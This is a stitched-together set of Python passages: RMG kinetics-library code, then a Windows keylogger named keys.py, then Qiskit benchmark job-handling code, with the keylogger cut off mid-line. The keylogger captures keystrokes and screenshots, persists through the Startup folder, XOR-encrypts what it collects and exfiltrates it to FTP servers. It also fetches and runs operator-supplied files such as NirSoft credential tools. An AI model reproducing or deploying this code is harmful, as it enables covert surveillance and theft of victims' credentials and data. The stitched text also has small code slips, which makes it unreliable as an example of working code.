Trange = '{0:g}-{1:g} '.format(entry.data.Tmin.value, entry.data.Tmax.value)
flib.write('{0:<12}'.format(Trange))
flib.write('{0:11.2e} {1:9.2f} {2:9.2f} {3:11.2f} '.format(
entry.data.A.value * factor,
entry.data.n.value,
entry.data.alpha.value,
entry.data.E0.value / 4184.
))
if entry.data.A.isUncertaintyMultiplicative():
flib.write('*{0:<6g} '.format(entry.data.A.uncertainty))
else:
flib.write('{0:<7g} '.format(entry.data.A.uncertainty * factor))
flib.write('{0:6g} {1:6g} {2:6g} '.format(
entry.data.n.uncertainty,
entry.data.alpha.uncertainty,
entry.data.E0.uncertainty / 4184.
))
if not entry.rank:
entry.rank = 0
flib.write(' {0:<4d} {1}\n'.format(entry.rank, entry.shortDesc))
fcom.write('------\n')
fcom.write('{0}\n'.format(entry.index))
fcom.write('------\n')
fcom.write(entry.longDesc.strip() + '\n\n')
flib.close()
fcom.close()
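# Note: each rateLibrary.txt data line written above holds the entry index, its
# semicolon-separated group labels, the temperature range, A (scaled by `factor`), n,
# alpha, E0 in kcal/mol (hence the division by 4184), their uncertainties, the rank and
# the short description.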
################################################################################
class KineticsLibrary(Database):
"""
A class for working with an RMG kinetics library.
"""
def __init__(self, label='', name='', shortDesc='', longDesc=''):
Database.__init__(self, label=label, name=name, shortDesc=shortDesc, longDesc=longDesc)
def __repr__(self):
return '<KineticsLibrary "{0}">'.format(self.label)
def getSpecies(self):
"""
Return a dictionary containing all of the species in this kinetics
library.
"""
speciesDict = {}
def speciesMatch(speciesA, speciesB):
for moleculeA in speciesA.molecule:
for moleculeB in speciesB.molecule:
if moleculeA.isIsomorphic(moleculeB):
return True
return False
entries = self.entries.values()
for entry in entries:
for reactant in entry.item.reactants:
if reactant.label not in speciesDict:
speciesDict[reactant.label] = reactant
elif not speciesMatch(reactant, speciesDict[reactant.label]):
print reactant.molecule[0].toAdjacencyList()
print speciesDict[reactant.label].molecule[0].toAdjacencyList()
raise DatabaseError('Species label "{0}" used for multiple species in kinetics library {1}.'.format(reactant.label, self.label))
for product in entry.item.products:
if product.label not in speciesDict:
speciesDict[product.label] = product
elif not speciesMatch(product, speciesDict[product.label]):
import pdb; pdb.set_trace()
print product.molecule[0].toAdjacencyList()
print speciesDict[product.label].molecule[0].toAdjacencyList()
print product.molecule[0].isIsomorphic(speciesDict[product.label].molecule[0])
raise DatabaseError('Species label "{0}" used for multiple species in kinetics library {1}.'.format(product.label, self.label))
return speciesDict
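# Note: getSpecies() above enforces that a species label maps to a single structure
# across the library -- reusing a label for a non-isomorphic species raises DatabaseError.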
def markValidDuplicates(self, reactions1, reactions2):
"""
Check for reactions that appear in both lists,
and mark them as (valid) duplicates.
"""
for r1 in reactions1:
for r2 in reactions2:
if (r1.reactants == r2.reactants and
r1.products == r2.products and
r1.reversible == r2.reversible
):
r1.duplicate = True
r2.duplicate = True
def checkForDuplicates(self):
"""
Check that all duplicate reactions in the kinetics library are
properly marked (i.e. with their ``duplicate`` attribute set to
``True``).
"""
for entry0 in self.entries.values():
reaction0 = entry0.item
if not reaction0.duplicate:
# This reaction is not marked as a duplicate reaction
# This means that if we find any duplicate reactions, it is an error
for entry in self.entries.values():
reaction = entry.item
if (reaction0 is not reaction and
reaction0.reactants == reaction.reactants and
reaction0.products == reaction.products and
reaction0.reversible == reaction.reversible
):
# We found a duplicate reaction that wasn't marked!
raise DatabaseError('Unexpected duplicate reaction {0} in kinetics library {1}.'.format(reaction0, self.label))
def convertDuplicatesToMulti(self):
"""
Merge all marked duplicate reactions in the kinetics library
into single reactions with multiple kinetics.
"""
print "trying to find duplicates"
entries_to_remove = []
for entry0 in self.entries.values():
if entry0 in entries_to_remove:
continue
reaction0 = entry0.item
if not reaction0.duplicate:
continue
print "Found a duplicate reaction: {0}".format(reaction0)
duplicates = [entry0]
for entry in self.entries.values():
reaction = entry.item
if reaction0 is reaction:
continue
if reaction0.isIsomorphic(reaction, eitherDirection=False):
if reaction0.reversible != reaction.reversible:
print "Reactions isomorphic but with different reversibilities"
continue
duplicates.append(entry)
assert len(duplicates)>1
kineticsList = []
longDesc = ''
for entry in duplicates:
kinetics = entry.data
kineticsList.append(kinetics)
Tmin = kinetics.Tmin
Tmax = kinetics.Tmax
Pmin = kinetics.Pmin
Pmax = kinetics.Pmax
longDesc += entry.longDesc+'\n'
entry0.data = MultiKinetics(kineticsList=kineticsList, Tmin=Tmin, Tmax=Tmax, Pmin=Pmin, Pmax=Pmax)
entry0.longDesc = longDesc
entries_to_remove.extend(duplicates[1:])
for entry in entries_to_remove:
print "removing duplicate reaction with index {0}.".format(entry.index)
del(self.entries[entry.index])
print "NB. the entries have not been renumbered, so these indices are missing."
def load(self, path, local_context=None, global_context=None):
Database.load(self, path, local_context, global_context)
# Generate a unique set of the species in the kinetics library
speciesDict = self.getSpecies()
# Make sure all of the reactions draw from only this set
entries = self.entries.values()
for entry in entries:
entry.item.reactants = [speciesDict[spec.label] for spec in entry.item.reactants]
entry.item.products = [speciesDict[spec.label] for spec in entry.item.products]
self.checkForDuplicates()
def loadEntry(self,
index,
reactant1,
product1,
kinetics,
reactant2=None,
reactant3=None,
product2=None,
product3=None,
degeneracy=1,
label='',
duplicate=False,
reversible=True,
reference=None,
referenceType='',
shortDesc='',
longDesc='',
history=None
):
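# Each reactant/product argument is an adjacency-list string: its first line is used
# as the species label, and the full string is parsed into a Molecule via
# fromAdjacencyList().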
reactants = [Species(label=reactant1.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(reactant1)])]
if reactant2 is not None: reactants.append(Species(label=reactant2.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(reactant2)]))
if reactant3 is not None: reactants.append(Species(label=reactant3.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(reactant3)]))
products = [Species(label=product1.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(product1)])]
if product2 is not None: products.append(Species(label=product2.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(product2)]))
if product3 is not None: products.append(Species(label=product3.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(product3)]))
comment = "Reaction and kinetics from {0}.".format(self.label)
if shortDesc.strip():
comment += "{0!s}\n".format(shortdesc.strip())
if longDesc.strip():
comment += str(re.sub('\s*\n\s*','\n',longDesc))
kinetics.comment = comment.strip()
self.entries[index] = Entry(
index = index,
label = label,
item = Reaction(reactants=reactants, products=products, degeneracy=degeneracy, duplicate=duplicate, reversible=reversible),
data = kinetics,
reference = reference,
referenceType = referenceType,
shortDesc = shortDesc,
longDesc = longDesc.strip(),
history = history or [],
)
def saveEntry(self, f, entry):
"""
Write the given `entry` in the kinetics library to the file object `f`.
"""
return saveEntry(f, entry)
def loadOld(self, path):
"""
Load an old-style RMG kinetics library from the location `path`.
"""
path = os.path.abspath(path)
self.loadOldDictionary(os.path.join(path,'species.txt'), pattern=False)
species = dict([(label, Species(label=label, molecule=[entry.item])) for label, entry in self.entries.iteritems()])
reactions = []
reactions.extend(self.__loadOldReactions(os.path.join(path,'reactions.txt'), species))
if os.path.exists(os.path.join(path,'pdepreactions.txt')):
pdep_reactions = self.__loadOldReactions(os.path.join(path,'pdepreactions.txt'), species)
# RMG-Py likes otherwise equivalent PDep and non-pdep reactions to be marked as duplicates
self.markValidDuplicates(reactions, pdep_reactions)
reactions.extend(pdep_reactions)
self.entries = {}
for index, reaction in enumerate(reactions):
entry = Entry(
index = index+1,
item = reaction,
data = reaction.kinetics,
)
entry.longDesc = reaction.kinetics.comment
reaction.kinetics.comment = ''
self.entries[index+1] = entry
reaction.kinetics = None
self.checkForDuplicates()
self.convertDuplicatesToMulti()
def __loadOldReactions(self, path, species):
"""
Load an old-style reaction library from `path`. This algorithm can
handle both the pressure-independent and pressure-dependent reaction
files. If the pressure-dependent file is read, the extra pressure-
dependent kinetics information is ignored unless the kinetics database
is a seed mechanism.
"""
reactions = []
# Process the reactions or pdepreactions file
try:
inUnitSection = False; inReactionSection = False
Aunits = []; Eunits = ''
reaction = None; kinetics = None
next_reaction_comment = ''
fdict = open(path, 'r')
for line in fdict:
line, comment = splitLineAndComment(line)
line = line.strip()
if len(line) == 0:
comment = comment.strip()
# collect all comment lines and assume they're for the following reaction
next_reaction_comment += comment + '\n'
continue
else: # line is not empty
if inUnitSection:
if 'A:' in line or 'E:' in line:
units = line.split()[1]
if 'A:' in line:
Aunits0 = units.split('/') # Assume this is a 3-tuple: moles or molecules, volume, time
Aunits0[1] = Aunits0[1][0:-1] # Remove '3' from e.g. 'm3' or 'cm3'; this is assumed
Aunits = [
'', # Zeroth-order
'{0}^-1'.format(Aunits0[2]), # First-order
'{0}^3/({1}*{2})'.format(Aunits0[1], Aunits0[0], Aunits0[2]), # Second-order
'{0}^6/({1}^2*{2})'.format(Aunits0[1], Aunits0[0], Aunits0[2]), # Third-order
]
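# Worked example (assuming a unit line such as "A: mol/cm3/s"): Aunits0 becomes
# ['mol', 'cm', 's'] after stripping the trailing '3', so Aunits ends up as
# ['', 's^-1', 'cm^3/(mol*s)', 'cm^6/(mol^2*s)'] for zeroth- through third-order rates.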
elif 'E:' in line:
Eunits = units
elif inReactionSection:
if '=' in line:
# This line contains a reaction equation, (high-P) Arrhenius parameters, and uncertainties
# Strip out "(+M)" from line
line = line.replace("(+M)", "")
line = line.replace("(+m)", "")
items = line.split()
# Find the reaction arrow
for arrow in ['<=>', '=>', '=', '->']:
if arrow in items:
arrowIndex = items.index(arrow)
break
# Find the start of the data
try:
temp = float(items[-6])
dataIndex = -6
except ValueError:
dataIndex = -3
# Find the reactant and product items
hasThirdBody = False
reactantItems = []
for item in items[0:arrowIndex]:
if item != '+':
for i in item.split('+'):
if i != '' and i != 'M' and i != 'm': reactantItems.append(i)
elif i != '' and (i == 'M' or i == 'm'): hasThirdBody = True
productItems = []
for item in items[arrowIndex+1:dataIndex]:
if item != '+':
for i in item.split('+'):
if i != '' and i != 'M' and i != 'm': productItems.append(i)
elif i != '' and (i == 'M' or i == 'm'): hasThirdBody = True
reactants = []; products = []
for item in reactantItems:
try:
reactants.append(species[item])
except KeyError:
raise DatabaseError('Reactant {0} not found in species dictionary.'.format(item))
for item in productItems:
try:
products.append(species[item])
except KeyError:
raise DatabaseError('Product {0} not found in species dictionary.'.format(item))
if dataIndex == -6:
A, n, Ea, dA, dn, dEa = items[-6:]
A = | |
<filename>source/keys.py
'''
Python 2.7 implementation with some additional functionality:
-systeminfo data is uploaded when the file is executed
-all the data uploaded to FTP server is encrypted (keys_retriever.py is used to collect/decrypt the data)
-ability to take screenshot with simple kl.UploadScreenShot()
-auto-downloader so you can use keys_retriever.py to upload some file and it will be executed on the target, keys_retrieve.py allows to set few parameters to it like (persistence/execute/upload results if it's nirsoft application)
-use several ftp accounts in case if 1 is not available (drivehq.com has 25 logins/day limit so that's why there's such function)
-"keep alive" (NOOP) packet is sent each minute to the FTP
'''
import pyHook
import pythoncom
import sys, os
import ftplib, datetime
import threading, time
from Queue import Queue
import io, subprocess
from urllib2 import urlopen
import socket
import win32api
from ctypes import Structure, windll, c_uint, sizeof, byref #needed for GetIdleTime()
from random import randint
from PIL import ImageGrab, Image
import StringIO
class LASTINPUTINFO(Structure): #needed for GetIdleTime()
_fields_ = [
('cbSize', c_uint),
('dwTime', c_uint),
]
xorMap = [235, 235, 126, 240, 203, 237, 81, 160, 9, 37, 204, 43, 190, 31, 76, 98, 53, 200, 222, 172, 184, 172, 157, 214, 128, 194, 175, 119, 254, 25, 25, 193, 109, 190, 240, 162, 184, 184, 114, 117, 57, 63, 167, 61, 104, 86, 146, 85, 114, 205, 0, 73, 162, 188, 129, 22, 67, 26, 80, 50, 190, 7, 91, 15, 56, 127, 226, 61, 172, 204, 76, 72, 40, 154, 65, 85, 8, 223, 211, 178, 149, 106, 57, 204, 236, 147, 54, 246, 59, 90, 43, 148, 9, 50, 253, 74, 143, 201, 48, 252, 236, 236, 139, 30, 124, 44, 21, 245, 179, 53, 85, 243, 230, 21, 49, 7, 239, 153, 46, 9, 1, 119, 105, 25, 71, 139, 75, 58, 43, 229, 88, 234, 226, 201, 1, 69, 16, 71, 97, 32, 195, 197, 215, 37, 219, 81, 243, 202, 181, 177, 193, 98, 179, 92, 180, 72, 219, 176, 115, 173, 16, 212, 118, 24, 204, 18, 123, 155, 197, 254, 226, 208, 80, 120, 46, 222, 152, 213, 68, 33, 153, 62, 192, 162, 16, 225, 110, 81, 65, 156, 212, 31, 26, 178, 195, 23, 141, 241, 48, 180]
def ExceptionHandler(func): #the exe won't popup "Couldn't execute keys script" but will output encrypted exception to e.mm file and "gracefully" exit
def call(*args, **kwargs):
try: return func(*args, **kwargs)
except Exception as e:
#with open("e.mm", "wb") as f:
#f.write(XorText("Exception:\n"+str(e), xorMap)) #it's not a good idea to save it to a file if it's in the startup folder...
print "Handled exception:\n"+str(e)
raise SystemExit
return call
@ExceptionHandler
def GetIdleTime():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
windll.user32.GetLastInputInfo(byref(lastInputInfo))
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
@ExceptionHandler
def ProcessCmd(command):
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
r = proc.stdout.read() + proc.stderr.read()
return r[:len(r)-2]
@ExceptionHandler
def XorText(text, xorMap):
xoredText = ""
for i, letter in enumerate(text):
xoredText += chr(ord(text[i]) ^ (xorMap[i%len(xorMap)] ^ (xorMap[(len(text)- 1)%len(xorMap)]))) #chr(ord(letter) ^ xorMap[i%len(xorMap)])
return xoredText
@ExceptionHandler
def FilterKey(k, text):
if len(text) > len(k) and len(text) > 3:
if text[len(text)-len(k):] == k and (len(k) > 1 or any(specialKey == k and specialKey == text[len(text)-1] and specialKey == text[len(text)-2] for specialKey in ["w", "s", "a", "d"])):
return ""
return k
@ExceptionHandler
def GetPublicIP():
return str(urlopen('http://ip.42.pl/raw').read())
@ExceptionHandler
def GetLocalIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 0))
IP = s.getsockname()[0]
except: IP = '127.0.0.1'
finally: s.close()
return str(IP)
class Keylogger:
@ExceptionHandler
def __init__(self, **kwargs):
self.debug = kwargs.get("debug", False)
self.postfreq = kwargs.get("postfreq", 20)
self.q = Queue()
self.xorMap = xorMap
self.windowname = ""
self.strbuff = ""
self.secSendFile = time.clock()
self.secKeepConAlive = time.clock()
self.secCheckScreenCaptureRequest = time.clock()
self.secDownloadFile = time.clock()
self.ftpFolderName = "_" + "".join(letter for letter in ProcessCmd("echo %USERNAME%") if letter.isalnum())
@ExceptionHandler
def __del__(self):
try: self.ftp.quit()
except:
try: self.ftp.close()
except: pass
try: self.hookManager.UnhookKeyboard()
except: pass
@ExceptionHandler
def StartKeyCapture(self):
self.hookManager = pyHook.HookManager()
self.hookManager.KeyDown = self.OnKeypressCallback
self.hookManager.HookKeyboard()
pythoncom.PumpMessages()
@ExceptionHandler
def OnKeypressCallback(self, press):
if press.Ascii not in range(32,126):
self.q.put([FilterKey("<"+press.Key+">", self.strbuff), press.WindowName])
else:
self.q.put([FilterKey(chr(press.Ascii), self.strbuff), press.WindowName])
return True
@ExceptionHandler
def CopyItselfToStartup(self):
desired_file = ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/" + os.path.basename(sys.argv[0])
if not os.path.isfile(desired_file):
with open(os.path.basename(sys.argv[0]), "rb") as base_f, open(desired_file, "wb") as new_f:
new_f.write(base_f.read())
if self.debug: print "Copied itself to startup"
@ExceptionHandler
def FTP_Connect(self, server, port, name_list, pswd_list):
for name, pswd in zip(name_list, pswd_list):
try:
self.ftp = ftplib.FTP()
self.ftp.connect(server, port)
self.ftp.login(name, pswd)
except: continue
directories = []
self.ftp.retrlines('LIST', directories.append)
if not any(self.ftpFolderName in d for d in directories):
self.ftp.mkd(self.ftpFolderName)
if self.debug: print "Connected to the ftp server (" + ", ".join([server, name, pswd]) + ")"
return True
raise ValueError("Couldn't connect to: " + server + " using the following credentials:\n" + "".join(u + " : " + p + "\n" for u,p in zip(name_list, pswd_list)))
@ExceptionHandler
def UploadSystemInfo(self):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("_" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\_")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\_\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(XorText(GetPublicIP() +"\n"+ GetLocalIP() + "\n" + ProcessCmd("systeminfo"), xorMap)))
if self.debug: print "Systeminfo uploaded"
@ExceptionHandler
def UploadScreenShot(self, **kwargs):
screenFolder = "vv" if kwargs.get("vidstream") == True else "ii"
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any(screenFolder in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName + "\\" + screenFolder)
ss_pil = ImageGrab.grab()
imgBuff = StringIO.StringIO()
ss_pil.save(imgBuff, "JPEG")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName + "\\" + screenFolder + "\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(XorText(imgBuff.getvalue(), xorMap)))
imgBuff.close()
if self.debug: print "ScreenShot uploaded (\\" + screenFolder +")"
@ExceptionHandler
def IsScreenCaptureStreamRequested(self, **kwargs): #not developed it much, it requires more work to be done to be fully functional
if kwargs.get("dircheck", False) == True:
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("vv" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\vv")
return False
if any(f.startswith("s") for f in self.ftp.nlst("\\"+self.ftpFolderName+"\\vv")):
return True
return False
@ExceptionHandler
def IsFileDownloadAvailable(self):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("f" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\f")
if "f.mm" in self.ftp.nlst("\\"+self.ftpFolderName+"\\f"):
return True
return False
@ExceptionHandler
def DownloadFile(self):
if self.debug: print "DownloadFile"
dataChunks = []
if self.debug: print "0"
self.ftp.retrbinary('RETR ' + "\\"+ self.ftpFolderName +"\\f\\f.mm", dataChunks.append)
if self.debug: print 1
fileInfo, fileData = XorText("".join(dataChunks), self.xorMap).split("###########################_____________________###############################")
if self.debug: print 2
destinationFileName = [v.split("=")[1] for v in fileInfo.split("\n") if "destinationFileName" in v][0]
destinationPath = [v.split("=")[1] for v in fileInfo.split("\n") if "destinationPath" in v][0]
destinationPath = (ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/") if destinationPath == "startup" else (ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/" + destinationPath)
execute = True if [v.split("=")[1] for v in fileInfo.split("\n") if "execute" in v][0] == "True" else False
params = [v.split("=")[1] for v in fileInfo.split("\n") if "params" in v][0]
isNirsoft = True if [v.split("=")[1] for v in fileInfo.split("\n") if "nirsoft" in v][0] == "True" else False
desiredFile = destinationPath + destinationFileName
if not os.path.exists(destinationPath):
os.makedirs(destinationPath)
if os.path.isfile(desiredFile):
os.remove(desiredFile)
with open(desiredFile, "wb") as f:
f.write(fileData)
if self.debug: print "Downloaded "+ destinationFileName
if execute:
ProcessCmd("start \"\" \""+ desiredFile + "\"" + (" "+params if params != "none" else ""))
if self.debug: print "Executed "+ destinationFileName
if isNirsoft:
nsOutput = destinationFileName.split(".")[0] + ".mm"
for i in range(100):
time.sleep(0.1)
if os.path.isfile(nsOutput):
break
else:
if self.debug: print "Nirsoft output not available"
os.remove(desiredFile)
return
with open(nsOutput, "rb") as f:
data = XorText(f.read(),self.xorMap)
os.remove(nsOutput)
os.remove(desiredFile)
if self.debug: print "Nirsoft application and output files removed"
self.UploadNirsoftData(data, nsOutput)
self.ftp.delete("\\"+ self.ftpFolderName +"\\f\\f.mm")
if self.debug: print "Deleted "+ destinationFileName + " from ftp server"
@ExceptionHandler
def UploadNirsoftData(self, data, fileName):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("n" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\n")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\n\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(data))
if self.debug: print "Nirsoft data uploaded"
@ExceptionHandler
def Update(self):
try:data = self.q.get(block=False)
except:data = ["",self.windowname]
if data[1] != self.windowname:
self.windowname = data[1]
self.strbuff += "\n\n["+self.windowname+"]\n"
#print "secSendFile=" + str(self.secSendFile) + ", time.clock()=" + str(time.clock())
#print data[0]
self.strbuff += data[0]
if (time.clock() - self.secKeepConAlive) > 60: #every 1 min
self.secKeepConAlive = time.clock()
if self.debug: print "Keep connection alive is going to be sent."
self.ftp.voidcmd("NOOP")
if self.debug: print "Keep connection | |
"barrier": continue
if key.startswith("c"): n2q += value
else: n1q += value
qc_tr_xi = n2q / (n1q + n2q)
#print(f"... qc_tr_xi = {qc_tr_xi} {n1q} {n2q}")
# use noise model from execution options if given for simulator
this_noise = noise
if backend_exec_options != None and "noise_model" in backend_exec_options:
this_noise = backend_exec_options["noise_model"]
#print(f"... using custom noise model: {this_noise}")
# Initiate execution (with noise if specified and this is a simulator backend)
if this_noise is not None and backend.name().endswith("qasm_simulator"):
#print("... performing simulation")
simulation_circuits = circuit["qc"]
# use execution options if set for simulator
if backend_exec_options != None:
# apply transformer pass if provided
if "transformer" in backend_exec_options:
#print("... applying transformer to sim!")
st = time.time()
trans_qc = transpile(circuit["qc"], backend)
simulation_circuits = backend_exec_options["transformer"](trans_qc, backend=backend)
# if transformer results in multiple circuits, divide shot count
# results will be accumulated in job_complete
# NOTE: this will need to set a flag to distinguish from multiple circuit execution
if len(simulation_circuits) > 1:
shots = int(shots / len(simulation_circuits))
if verbose_time:
print(f" *** transformer() time = {time.time() - st}")
# for noisy simulator, use execute() which works; it is unclear from docs
# whether noise_model should be passed to transpile() or run()
st = time.time()
job = execute(simulation_circuits, backend, shots=shots,
noise_model=this_noise, basis_gates=this_noise.basis_gates)
if verbose_time:
print(f" *** qiskit.execute() time = {time.time() - st}")
# Initiate execution for all other backends and the noiseless simulator
else:
#print(f"... executing on backend: {backend.name()}")
# use execution options if set for backend
if backend_exec_options != None:
optimization_level = 1
if "optimization_level" in backend_exec_options:
optimization_level = backend_exec_options["optimization_level"]
layout_method = None
if "layout_method" in backend_exec_options:
layout_method = backend_exec_options["layout_method"]
routing_method = None
if "routing_method" in backend_exec_options:
routing_method = backend_exec_options["routing_method"]
#job = execute(circuit["qc"], backend, shots=shots,
# the 'execute' method includes transpile, use transpile + run instead (to enable time metrics)
st = time.time()
trans_qc = transpile(circuit["qc"], backend,
optimization_level=optimization_level,
layout_method=layout_method,
routing_method=routing_method)
if verbose_time:
print(f" *** qiskit.transpile() time = {time.time() - st}")
# apply transformer pass if provided
if "transformer" in backend_exec_options:
st = time.time()
#print("... applying transformer!")
trans_qc2 = backend_exec_options["transformer"](trans_qc, backend)
trans_qc = trans_qc2
# if transformer results in multiple circuits, divide shot count
# results will be accumulated in job_complete
# NOTE: this will need to set a flag to distinguish from multiple circuit execution
if len(trans_qc) > 1:
shots = int(shots / len(trans_qc))
if verbose_time:
print(f" *** transformer() time = {time.time() - st}")
st = time.time()
job = backend.run(trans_qc, shots=shots)
if verbose_time:
print(f" *** qiskit.run() time = {time.time() - st}")
# execute with no options set
else:
st = time.time()
job = execute(circuit["qc"], backend, shots=shots)
if verbose_time:
print(f" *** qiskit.execute() time = {time.time() - st}")
# there appears to be no reason to do transpile, as it is done automatically
# DEVNOTE: this prevents us from measuring transpile time
# If we use this method, we'd need to validate on all backends again, so leave for now
#qc = transpile(circuit["qc"], backend)
#job = execute(qc, backend, shots=shots)
except Exception as e:
print(f'ERROR: Failed to execute circuit {active_circuit["group"]} {active_circuit["circuit"]}')
print(f"... exception = {e}")
return
# print("Job status is ", job.status() )
# put job into the active circuits with circuit info
active_circuits[job] = active_circuit
# print("... active_circuit = ", str(active_circuit))
# store circuit dimensional metrics
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'depth', qc_depth)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'size', qc_size)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'xi', qc_xi)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'tr_depth', qc_tr_depth)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'tr_size', qc_tr_size)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'tr_xi', qc_tr_xi)
# return, so caller can do other things while waiting for jobs to complete
# deprecated code ...
'''
# wait until job is complete
job_wait_for_completion(job)
##############
# Here we complete the job immediately
job_complete(job)
'''
if verbose:
print(f"... executing job {job.job_id()}")
# Process a completed job
def job_complete(job):
active_circuit = active_circuits[job]
if verbose:
print(f'\n... job complete - group={active_circuit["group"]} id={active_circuit["circuit"]} shots={active_circuit["shots"]}')
# compute elapsed time for circuit; assume exec is same, unless obtained from result
elapsed_time = time.time() - active_circuit["launch_time"]
# report exec time as 0 unless valid measure returned
exec_time = 0.0
# get job result (DEVNOTE: this might be different for diff targets)
result = None
if job.status() == JobStatus.DONE:
result = job.result()
# print("... result = ", str(result))
# get breakdown of execution time, if method exists
# this attribute not available for some providers;
if "time_per_step" in dir(job) and callable(job.time_per_step):
time_per_step = job.time_per_step()
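# The stage arithmetic below assumes the provider reports timestamps for the
# sequence CREATING -> VALIDATING -> QUEUED -> RUNNING -> COMPLETED.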
exec_creating_time = (time_per_step["VALIDATING"] - time_per_step["CREATING"]).total_seconds()
exec_validating_time = (time_per_step["QUEUED"] - time_per_step["VALIDATING"]).total_seconds()
exec_queued_time = (time_per_step["RUNNING"] - time_per_step["QUEUED"]).total_seconds()
exec_running_time = (time_per_step["COMPLETED"] - time_per_step["RUNNING"]).total_seconds()
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_creating_time', exec_creating_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_validating_time', exec_validating_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_queued_time', exec_queued_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_running_time', exec_running_time)
else:
time_per_step = {}
exec_creating_time = 0
exec_validating_time = 0
exec_queued_time = 0
exec_running_time = 0
#print("... time_per_step = ", str(time_per_step))
if verbose:
print(f"... exec times, creating = {exec_creating_time}, validating = {exec_validating_time}, queued = {exec_queued_time}, running = {exec_running_time}")
# counts = result.get_counts(qc)
# print("Total counts are:", counts)
# obtain timing info from the results object
result_obj = result.to_dict()
results_obj = result.to_dict()['results'][0]
#print(f"result_obj = {result_obj}")
#print(f"results_obj = {results_obj}")
#print(f'shots = {results_obj["shots"]}')
# get the actual shots and convert to int if it is a string
actual_shots = 0
for experiment in result_obj["results"]:
actual_shots += experiment["shots"]
if type(actual_shots) is str:
actual_shots = int(actual_shots)
if actual_shots != active_circuit["shots"]:
print(f'WARNING: requested shots not equal to actual shots: {active_circuit["shots"]} != {actual_shots} ')
if "time_taken" in result_obj:
exec_time = result_obj["time_taken"]
elif "time_taken" in results_obj:
exec_time = results_obj["time_taken"]
# remove from list of active circuits
del active_circuits[job]
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'elapsed_time', elapsed_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_time', exec_time)
# If a result handler has been established, invoke it here with result object
if result != None and result_handler:
# The following computes the counts by summing them up, allowing for the case where
# <result> contains results from multiple circuits
# DEVNOTE: This will need to change; currently the only case where we have multiple result counts
# is when using randomly_compile; later, there will be other cases
if type(result.get_counts()) == list:
total_counts = dict()
for count in result.get_counts():
total_counts = dict(Counter(total_counts) + Counter(count))
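# e.g. Counter({'00': 10, '11': 2}) + Counter({'00': 5}) yields {'00': 15, '11': 2},
# so shot counts for identical bitstrings are summed across the per-circuit results.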
# make a copy of the result object so we can return a modified version
orig_result = result
result = copy.copy(result)
# replace the results array with an array containing only the first results object
# then populate other required fields
results = copy.copy(result.results[0])
results.header.name = active_circuit["qc"].name # needed to identify the original circuit
results.shots = actual_shots
results.data.counts = total_counts
result.results = [ results ]
try:
result_handler(active_circuit["qc"],
result,
active_circuit["group"],
active_circuit["circuit"],
active_circuit["shots"]
)
except Exception as e:
print(f'ERROR: failed to execute result_handler for circuit {active_circuit["group"]} {active_circuit["circuit"]}')
print(f"... exception = {e}")
# Process a job, whose status cannot be obtained
def job_status_failed(job):
active_circuit = active_circuits[job]
if verbose:
print(f'\n... job status failed - group={active_circuit["group"]} id={active_circuit["circuit"]} shots={active_circuit["shots"]}')
# compute elapsed time for circuit; assume exec is same, unless obtained from result
elapsed_time = time.time() - active_circuit["launch_time"]
# report exec time as 0 unless valid measure returned
exec_time = 0.0
# remove from list of active circuits
del active_circuits[job]
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'elapsed_time', elapsed_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_time', exec_time)
######################################################################
# JOB MANAGEMENT METHODS
# Job management involves coordinating the batching, queueing,
# and completion processing of circuits that are submitted for execution.
# Throttle the execution of active and batched jobs.
# Wait for active jobs to complete. As each job completes,
# check if there are any batched circuits waiting to be executed.
# If so, execute them, removing them from the batch.
# Execute the user-supplied completion handler to allow user to
